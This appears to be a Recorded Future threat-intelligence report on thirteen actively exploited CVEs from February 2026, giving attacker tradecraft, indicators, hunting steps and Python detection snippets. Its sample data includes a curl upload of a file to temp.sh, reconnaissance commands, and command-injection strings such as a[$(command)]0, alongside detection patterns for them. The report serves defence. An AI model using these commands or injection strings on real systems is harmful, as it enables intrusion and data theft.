February 2026 CVE Landscape: 13 Critical Vulnerabilities Mark 43% Drop from January
February 2026 saw a 43% decrease in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 13 vulnerabilities requiring immediate remediation, down from 23 in January 2026. All 13 carried a Very Critical Recorded Future Risk Score.
What security teams need to know:
- Microsoft dominates: Six of 13 vulnerabilities affected Microsoft products, accounting for 46% of February's findings; all were added to CISA's KEV catalog on the same day
- Supply-chain attack on Notepad++: Lotus Blossom, a suspected China state-sponsored threat actor, exploited CVE-2025-15556 to hijack Notepad++'s update channel and deliver a Cobalt Strike Beacon and the Chrysalis backdoor
- APT28 exploits MSHTML flaw: The Russian state-sponsored group leveraged CVE-2026-21513 via malicious Windows Shortcut files for multi-stage payload delivery
- Public exploits available: Four of 13 vulnerabilities have publicly available proof-of-concept code; an alleged exploit for a fifth is being advertised for sale
Bottom line: Despite a 43% drop in volume, February's vulnerabilities include named threat actor exploitation and five RCE-enabling flaws, making prioritized, intelligence-driven remediation as important as ever.
Quick Reference: February 2026 Vulnerability Table
All 13 vulnerabilities below were actively exploited in February 2026.
Table 1: List of vulnerabilities that were actively exploited in February based on Recorded Future data. *An alleged exploit for CVE-2026-21533 is being advertised for sale across GitHub. Recorded Future Triage was used to browse the website advertising the exploit, which can be viewed here via the Replay Monitor. (Source: Recorded Future)
Key Trends: February 2026
Vendors Most Affected
- Microsoft led with six vulnerabilities across Windows, Windows Server, Office, and Microsoft 365 products
- BeyondTrust faced a critical OS command injection flaw in Remote Support (RS) versions 25.3.1 and earlier, and Privileged Remote Access (PRA) versions 24.3.4 and earlier
- Cisco saw active exploitation of an authentication bypass in Catalyst SD-WAN infrastructure
- Additional affected vendors: Notepad++, Apple, Soliton Systems K.K., Google, and Dell
Most Common Weakness Types
- CWE-78 – OS Command Injection (tied for most common)
- CWE-693 – Protection Mechanism Failure (tied for most common)
- CWE-476 – NULL Pointer Dereference
- CWE-843 – Type Confusion
- CWE-807 – Reliance on Untrusted Inputs in a Security Decision
Exploitation Activity
Vulnerabilities associated with malware campaigns:
- Lotus Blossom (suspected China state-sponsored) exploited CVE-2025-15556 to hijack Notepad++ update traffic between June and December 2025. The campaign rotated C2 servers across three attack chains to deliver a Metasploit loader, Cobalt Strike Beacon, and a custom backdoor called Chrysalis.
- APT28 (Russian state-sponsored) exploited CVE-2026-21513 using malicious Windows Shortcut (.lnk) files with embedded HTML payloads for multi-stage payload delivery, with observed network communication to infrastructure associated with the threat group.
- UNC6201 (suspected China-nexus) exploited CVE-2026-22769 to compromise Dell RecoverPoint for VMs appliances, deploying the SLAYSTYLE web shell, BRICKSTORM backdoor, and GRIMBOLT, a C#-based backdoor with native AOT compilation to complicate detection.
Long-running exploitation activity:
- UAT-8616 exploited CVE-2026-20127, chaining it with CVE-2022-20775 to achieve root-level access on Cisco Catalyst SD-WAN systems, with Cisco Talos attributing the activity to a sophisticated threat actor and assessing that the activity dates back to at least 2023.
Priority Alert: Active Exploitation
These vulnerabilities demand immediate attention due to confirmed exploitation in the wild.
CVE-2025-15556 | Notepad++
Risk Score: 99 (Very Critical) | CISA KEV: Added February 12, 2026
Why this matters: Lotus Blossom exploited this flaw to replace legitimate Notepad++ update packages with malicious installers, deploying Cobalt Strike and the Chrysalis backdoor to targeted users over a six-month period. The vulnerability affects the WinGUp updater used by Notepad++ versions prior to 8.8.9, which fails to cryptographically verify downloaded update metadata and installers.
Affected versions: Notepad++ versions prior to 8.8.9 (version 8.9.1 recommended)
Immediate actions:
- Update to Notepad++ version 8.9.1, released January 26, 2026
- Hunt for the malicious update.exe sample (SHA256: 4d4aec6120290e21778c1b14c94aa6ebff3b0816fb6798495dc2eae165db4566) in your environment
- Monitor for GUP.exe spawning unexpected child processes
- Review network connections for traffic to 45[.]76[.]155[.]202, 45[.]77[.]31[.]210, 45[.]32[.]144[.]255, or 95[.]179[.]213[.]0
- Check for directories named ProShow under %APPDATA% or unexpected files in %APPDATA%\Adobe\Scripts\
- Block or alert on curl.exe uploading files to temp[.]sh
Known C2 infrastructure: 45[.]76[.]155[.]202, 45[.]77[.]31[.]210, cdncheck[.]it[.]com, safe-dns[.]it[.]com, 95[.]179[.]213[.]0
Detection resources: Insikt Group created Sigma rules to detect update.exe's execution of reconnaissance commands (whoami, tasklist, systeminfo, and netstat -ano) and curl commands for system information exfiltration, available to Recorded Future customers.
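The hunting steps above translate into three process-creation detections: GUP.exe spawning a child outside an allow-list, update.exe running any one of the reconnaissance commands (matched individually rather than as a combined pattern, since the deep dive notes the actors later split them into separate steps), and curl.exe reaching temp.sh. The following is an added example, not Recorded Future's Sigma rules; the event schema, the GUP.exe child allow-list and the sample telemetry are constructed assumptions.

```python
from dataclasses import dataclass

# Recon commands the page reports update.exe running. They are matched one
# command at a time, because the actors later split them into separate steps
# to evade detection keyed on the combined command-line pattern.
RECON_CMDS = {"whoami", "tasklist", "systeminfo", "netstat"}
# Children GUP.exe is expected to spawn. Assumption: tune this allow-list to
# what your own Notepad++ deployment legitimately launches.
EXPECTED_GUP_CHILDREN = {"notepad++.exe"}

@dataclass(frozen=True)
class ProcEvent:
    parent_image: str  # full path of the parent process
    image: str         # full path of the created process
    cmdline: str       # command line of the created process

def basename(path: str) -> str:
    return path.strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()

def classify(ev: ProcEvent) -> list:
    """Return the names of the detections that fire for one event."""
    parent, image = basename(ev.parent_image), basename(ev.image)
    tokens = ev.cmdline.split()
    cmd = basename(tokens[0]).removesuffix(".exe") if tokens else ""
    hits = []
    if parent == "gup.exe" and image not in EXPECTED_GUP_CHILDREN:
        hits.append("gup_unexpected_child")
    if parent == "update.exe" and cmd in RECON_CMDS:
        hits.append(f"update_recon_{cmd}")
    if image == "curl.exe" and "temp.sh" in ev.cmdline.lower():
        hits.append("curl_upload_temp_sh")
    return hits

def scan(events) -> list:
    """Pair each suspicious event with its detections; clean events are dropped."""
    return [(ev, hits) for ev in events if (hits := classify(ev))]

# Constructed sample telemetry (not real events) exercising every rule.
UPD = r"C:\Users\u\AppData\Local\Temp\nsq1F2.tmp\update.exe"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Notepad++\updater\GUP.exe", UPD, "update.exe"),
    ProcEvent(UPD, r"C:\Windows\System32\whoami.exe", "whoami"),
    ProcEvent(UPD, r"C:\Windows\System32\NETSTAT.EXE", "netstat -ano"),
    ProcEvent(UPD, r"C:\Windows\System32\curl.exe", "curl.exe -F file=@info.txt temp.sh"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\whoami.exe", "whoami"),
]

if __name__ == "__main__":
    for ev, hits in scan(SAMPLE_EVENTS):
        print(basename(ev.parent_image), "->", basename(ev.image), hits)
```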
CVE-2026-1731 | BeyondTrust Remote Support and Privileged Remote Access
Risk Score: 99 (Very Critical) | CISA KEV: Added February 13, 2026
Why this matters: Unauthenticated attackers can execute arbitrary OS commands over a WebSocket connection, enabling remote shell access and full system compromise, with no credentials required.
Affected versions: BeyondTrust Remote Support (RS) versions 25.3.1 and earlier; Privileged Remote Access (PRA) versions 24.3.4 and earlier
Immediate actions:
- Upgrade to BeyondTrust RS version 25.3.2 or later and PRA version 25.1 or later
- Monitor WebSocket connections to the /nw endpoint for crafted version strings containing subshell syntax (e.g., a[$(command)]0)
- Review logs for unexpected OS command execution originating from wsusservice or web service processes
- Restrict network access to BeyondTrust appliances to authorized management systems only
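The version-string check above can be run over whatever proxy or appliance records you keep for the /nw endpoint. This is an added example, not BeyondTrust's code: the record fields, the strict version grammar and the sample requests are constructed assumptions, and the a[$(command)]0 shape is the one the page describes.

```python
import re
from dataclasses import dataclass

# Assumption: one record per WebSocket request to the appliance, with the
# client-supplied version already extracted. Field names are constructed for
# this example and are not BeyondTrust's log schema.
@dataclass(frozen=True)
class NwRequest:
    src_ip: str
    path: str
    version: str

# Assumption: legitimate client versions are dotted numerics such as 25.3.1;
# adjust the grammar to what your clients actually send.
STRICT_VERSION = re.compile(r"\d+(\.\d+){0,3}")
# Shell constructs that have no business in a version string: command
# substitution $( ) and backticks, ${ } expansion, separators, redirection.
SHELL_SYNTAX = re.compile(r"\$\(|`|\$\{|[;|&<>]|\n")

def analyze_version(version: str) -> list:
    """Reasons a version string looks crafted; empty list means it looks sane."""
    reasons = []
    if SHELL_SYNTAX.search(version):
        reasons.append("shell_syntax")          # high confidence
    if not STRICT_VERSION.fullmatch(version):
        reasons.append("non_numeric_version")   # lower confidence, review
    return reasons

def triage(requests) -> list:
    """Return (request, reasons) for /nw requests whose version looks crafted."""
    flagged = []
    for req in requests:
        if req.path.split("?", 1)[0] != "/nw":
            continue                            # other endpoints are out of scope
        reasons = analyze_version(req.version)
        if reasons:
            flagged.append((req, reasons))
    return flagged

# Constructed sample requests (RFC 5737 documentation addresses).
SAMPLE = [
    NwRequest("10.0.0.5", "/nw", "25.3.1"),
    NwRequest("203.0.113.9", "/nw", "a[$(command)]0"),
    NwRequest("203.0.113.9", "/nw", "1.0`whoami`"),
    NwRequest("10.0.0.6", "/other", "a[$(command)]0"),
    NwRequest("198.51.100.2", "/nw", "1.2.3-beta"),
]
```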
CVE-2026-20127 | Cisco Catalyst SD-WAN Controller and Manager
Risk Score: 99 (Very Critical) | CISA KEV: Added February 25, 2026
Why this matters: UAT-8616 exploited this authentication bypass to gain high-privileged access to Cisco SD-WAN infrastructure, chaining it with CVE-2022-20775 to achieve root-level access and maintain persistent, covert footholds. CISA issued Emergency Directive 26-03, requiring federal civilian agencies to immediately remediate.
Affected products: Cisco Catalyst SD-WAN Controller (formerly vSmart) and Cisco Catalyst SD-WAN Manager (formerly vManage) in on-premises deployments and SD-WAN Cloud installations
Immediate actions:
- Update to patched release versions 20.9.8.2, 20.12.6.1, 20.12.5.3, 20.15.4.2, or 20.18.2.1
- Monitor SD-WAN logs for unexpected control-connection-state-change new-state:up events and unrecognized peer-system-ip values
- Audit SSH authorized_keys files at /home/root/.ssh/authorized_keys and /home/vmanage-admin/.ssh/authorized_keys/ for unauthorized entries
- Check /etc/ssh/sshd_config for PermitRootLogin yes
- Review logs for path traversal strings related to CVE-2022-20775, such as /../../ and /\n&../\n&../
- Hunt for cleared or truncated logs from syslog, wtmp, lastlog, cli-history, bash_history, and files in /var/log/, which may indicate log clearing
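Three of the hunting steps above (the authorized_keys audit, the PermitRootLogin check and the traversal-string sweep) can be scripted against copies of the files and logs pulled off the appliance. This is an added example, not Cisco's or Recorded Future's code; the approved-key allow-list, the placeholder key blobs and the sample log lines are constructed, and the second traversal marker is matched as the literal characters the page prints.

```python
import re

# Traversal markers exactly as the page prints them; the second is matched as
# the literal characters backslash-n, which is how it appears on the page.
TRAVERSAL_MARKERS = ("/../../", r"/\n&../\n&../")

def root_login_permitted(sshd_config: str) -> bool:
    """True if the effective PermitRootLogin is 'yes'. sshd honours the first
    occurrence of a directive, so the first uncommented match decides
    (Match blocks are not modelled here)."""
    for raw in sshd_config.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = re.match(r"(?i)^PermitRootLogin\s+(\S+)", line)
        if m:
            return m.group(1).lower() == "yes"
    return False  # directive absent: sshd's default is not 'yes'

def unapproved_keys(authorized_keys: str, approved_blobs: set) -> list:
    """Return authorized_keys entries whose key blob is not on the allow-list.
    Entries may start with options such as command="..." before the key type."""
    flagged = []
    for raw in authorized_keys.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        blob = None
        for i, f in enumerate(fields[:-1]):
            if f.startswith(("ssh-", "ecdsa-", "sk-")):
                blob = fields[i + 1]
                break
        if blob is None or blob not in approved_blobs:
            flagged.append(line)  # unparseable entries are surfaced too
    return flagged

def traversal_hits(log_lines) -> list:
    """Log lines containing either traversal marker."""
    return [l for l in log_lines if any(m in l for m in TRAVERSAL_MARKERS)]

# Constructed sample inputs (placeholders, not real keys or appliance logs).
SAMPLE_SSHD = "#PermitRootLogin no\nPermitRootLogin yes\nPermitRootLogin no\n"
APPROVED = {"AAAAC3-approved-key-placeholder"}
SAMPLE_KEYS = ("ssh-ed25519 AAAAC3-approved-key-placeholder admin@mgmt\n"
               'command="/bin/true" ssh-rsa AAAAB3-unknown-key-placeholder x\n')
SAMPLE_LOG = ["webserver: GET /api/../../ from 203.0.113.7",
              r"webserver: GET /\n&../\n&../ from 203.0.113.7",
              "webserver: GET /status from 10.0.0.4"]
```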
Technical Deep Dive: Exploitation Analysis
Notepad++ Supply-Chain Attack (CVE-2025-15556)
Three-chain attack evolution: Lotus Blossom ran three distinct attack chains between July and October 2025, each evolving to evade detection:
- Chain 1 (July–August 2025): Replaced the legitimate Notepad++ update package with a malicious NSIS installer (update.exe) that abused a legitimate ProShow.exe file to launch an exploit payload containing shellcode. The shellcode decrypted and launched a Metasploit downloader, which retrieved a Cobalt Strike Beacon shellcode from hxxps://45[.]77[.]31[.]210/users/admin and executed it.
- Chain 2 (September 2025): Reused the same update channel with a modified update.exe that dropped legitimate Lua interpreter files alongside a malicious alien.ini script. The compiled Lua script allocated and executed shellcode via the EnumWindowStationsW API, ultimately delivering Cobalt Strike Beacon. Threat actors later split reconnaissance commands into multiple steps to evade detection logic tied to combined command-line patterns.
- Chain 3 (October 2025): Shifted to a new distribution server and delivered a malicious update.exe file that dropped a legitimate Bitdefender Submission Wizard renamed as BluetoothService.exe, a malicious DLL named log.dll, and an encrypted shellcode file. Update.exe executed BluetoothService.exe, which sideloaded log.dll. Log.dll then decrypted the shellcode and injected it into the BluetoothService.exe process.
Why this matters: The sustained, multi-month nature of this exploitation activity, with iterative evasion improvements across three attack chains, reflects the hallmarks of a disciplined, state-sponsored operation. Organizations that rely on Notepad++ in managed environments should treat any network activity initiated by GUP.exe as suspect.
APT28 MSHTML Exploitation (CVE-2026-21513)
Browser trust boundary abuse: The vulnerability resides in ieframe.dll hyperlink navigation logic, where insufficient URL validation in _AttemptShellExecuteForHlinkNavigate() allows threat actor-controlled input to invoke ShellExecuteExW outside the intended browser security context.
Akamai identified a malicious .lnk file (document.doc.LnK) associated with APT28 infrastructure. The exploit uses nested iframes and multiple DOM contexts to manipulate browser trust boundaries, bypassing both Mark of the Web (MotW) and Internet Explorer Enhanced Security Configuration (IE ESC) before triggering the vulnerable navigation flow. The .lnk initiates network communication with wellnesscaremed[.]com as part of APT28's multistage payload delivery.
SHA256 for document.doc.LnK.download: aefd15e3c395edd16ede7685c6e97ca0350a702ee7c8585274b457166e86b1fa
Why this matters: APT28's use of a weaponized .lnk file exploiting a patched MSHTML flaw underscores the group's continued targeting of Windows environments and its willingness to operationalize browser-based vulnerabilities for initial access.
UNC6201 Dell RecoverPoint Campaign (CVE-2026-22769)
Persistence through VMware infrastructure: UNC6201 exploited hard-coded credentials stored in /home/kos/tomcat9/tomcat-users.xml to authenticate to the Apache Tomcat Manager and upload a malicious WAR file, deploying the SLAYSTYLE web shell and enabling RCE with root privileges.
After establishing access, UNC6201 deployed the BRICKSTORM backdoor for C2, then replaced it with GRIMBOLT in September 2025. GRIMBOLT uses native ahead-of-time (AOT) compilation to convert to machine-native code, removing common intermediate language metadata and complicating static analysis. UNC6201 then pivoted into VMware virtual infrastructure, creating temporary "Ghost NIC" network ports on ESXi-hosted VMs for stealthy lateral movement and implementing Single Packet Authorization (SPA) via iptables commands to gate access to their backdoor infrastructure.
Why this matters: The progression from web shell to persistent backdoors, and then the pivot to VMware infrastructure to support lateral movement demonstrates a mature, multi-stage intrusion methodology. Organizations running Dell RecoverPoint for VMs should assume default credentials have been compromised and hunt for SLAYSTYLE and GRIMBOLT indicators immediately.
Detection & Remediation Resources
Detection Artifacts from Insikt Group®
Recorded Future customers can access the following from Insikt Group®:
- CVE-2025-15556 – Sigma rules to detect reconnaissance commands (whoami, tasklist, systeminfo, netstat -ano) and curl-based exfiltration associated with the Notepad++ supply-chain attack
- CVE-2026-23760 (SmarterTools SmarterMail) – Nuclei template for authentication bypass detection, created in February (previously highlighted in January 2026 CVE Monthly)
Note: All detection artifacts are intended for use in authorized environments only.
Recorded Future Product Integrations
- Vulnerability Intelligence – Prioritize vulnerabilities based on real-world exploitation data, not just severity scores
- Attack Surface Intelligence – Identify exposed BeyondTrust, Cisco SD-WAN, and Dell RecoverPoint assets in your environment
- Third-Party Intelligence – Monitor vendor vulnerability exposure across your supply chain
Take Action
Ready to see how Recorded Future can help your team detect active exploitation, prioritize patching, and reduce attack surface risk? Explore our demo center to see these capabilities in action, or dive deeper into Insikt Group research for more threat intelligence insights.
About Insikt Group®:
Recorded Future's Insikt Group® threat research team is comprised of analysts, linguists, and security researchers with deep government and industry experience. Insikt Group® publishes threat intelligence to the Recorded Future analyst community in blog posts and analyst notes.